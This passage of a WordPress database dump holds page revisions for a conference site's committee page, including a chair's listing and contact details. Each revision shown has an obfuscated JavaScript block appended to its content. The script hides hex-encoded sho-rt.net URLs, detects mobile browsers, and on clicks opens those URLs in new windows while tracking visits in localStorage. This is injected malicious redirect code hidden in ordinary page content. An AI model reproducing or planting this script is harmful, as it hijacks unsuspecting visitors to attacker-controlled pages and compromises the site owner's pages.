e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 08:01:26','2023-06-27 08:01:26','',4823,'https://gsw2023.com/?p=4868',0,'revision','',0),
(4869,4,'2023-06-27 08:02:30','2023-06-27 08:02:30','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"medium\" style=\"vc_box_rounded\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 14pt;\"><strong>Chair</strong></span>\r\n\r\n<hr />\r\n\r\n<span style=\"font-size: 12pt;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"margin-right: 10px;\"><strong>E-mail:</strong></td>\r\n<td style=\"margin-right: 10px;\">aaelbary@aast.edu</td>\r\n<td style=\"margin-right: 10px;\">aaelbary@gsw2023.com</td>\r\n<td style=\"margin-right: 10px;\">gsw2023@aast.edu</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"margin-right: 10px;\"><strong>Contacts:</strong></td>\r\n<td style=\"margin-right: 10px;\">Office: +203 5497598</td>\r\n<td style=\"margin-right: 10px;\">Fax: +203 5497598</td>\r\n<td style=\"margin-right: 10px;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 08:02:30','2023-06-27 08:02:30','',4849,'https://gsw2023.com/?p=4869',0,'revision','',0),
(4870,4,'2023-06-27 08:05:14','2023-06-27 08:05:14','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"medium\" style=\"vc_box_rounded\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 14pt;\"><strong>Chair</strong></span>\r\n\r\n<hr />\r\n\r\n<span style=\"font-size: 12pt;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 